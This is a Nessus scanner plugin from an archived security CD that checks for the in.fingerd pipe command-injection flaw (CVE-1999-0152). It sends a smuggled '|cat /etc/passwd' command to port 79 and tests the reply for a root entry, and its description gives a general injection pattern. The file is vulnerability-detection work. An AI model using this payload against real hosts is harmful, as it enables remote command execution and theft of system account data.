home *** CD-ROM | disk | FTP | other *** search
/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / modules / nessus-2.2.8.mo / usr / lib / nessus / plugins / in_fingerd.nasl < prev    next >
Text File  |  2005-01-14  |  2KB  |  69 lines

  1. #
  2. # This script was written by Renaud Deraison <deraison@cvs.nessus.org>
  3. #
  4. # See the Nessus Scripts License for details
  5. #
  6. #T
  7.  
  8. if(description)
  9. {
  10.  script_id(10126);
  11.  script_version ("$Revision: 1.13 $");
  12.  script_cve_id("CVE-1999-0152");
  13.  name["english"] = "in.fingerd pipe";
  14.  
  15.  
  16.  script_name(english:name["english"]);
  17.  desc["english"] = "
  18. It is possible to force the remote finger daemon to execute arbitrary
  19. commands by issuing requests like :
  20.  
  21.     finger  |command_to_execute@target
  22.     
  23. An attacker may use this bug to gain a shell on this host.
  24.     
  25. Solution : Disable your finger daemon if you do not use it
  26. (comment out the 'finger' line in /etc/inetd.conf and restart the
  27. inetd process) or apply the latest patches from your vendor.
  28.  
  29. Risk factor : High";
  30.  
  31.     
  32.  
  33.  
  34.  script_description(english:desc["english"]);
  35.  
  36.  summary["english"] = "Determines whether in.fingerd is exploitable";
  37.  
  38.  script_summary(english:summary["english"]);
  39.  
  40.  script_category(ACT_GATHER_INFO);
  41.  
  42.  
  43.  script_copyright(english:"This script is Copyright (C) 1999 Renaud Deraison");
  44.  family["english"] = "Finger abuses";
  45.  script_family(english:family["english"]);
  46.  script_dependencie("find_service.nes");
  47.  script_require_ports("Services/finger", 79);
  48.  exit(0);
  49. }
  50.  
  51. #
  52. # The script code starts here
  53. #
  54.  
  55. port = get_kb_item("Services/finger");
  56. if(!port)port = 79;
  57. if(get_port_state(port))
  58. {
  59.  soc = open_sock_tcp(port);
  60.  if(soc)
  61.  {
  62.   d = string("|cat /etc/passwd\r\n");
  63.   send(socket:soc, data:d);
  64.   r = recv(socket:soc, length:65535);
  65.   if(egrep(pattern:"root:.*:0:[01]:", string:r))security_hole(port);
  66.   close(soc);
  67.  }
  68. }
  69.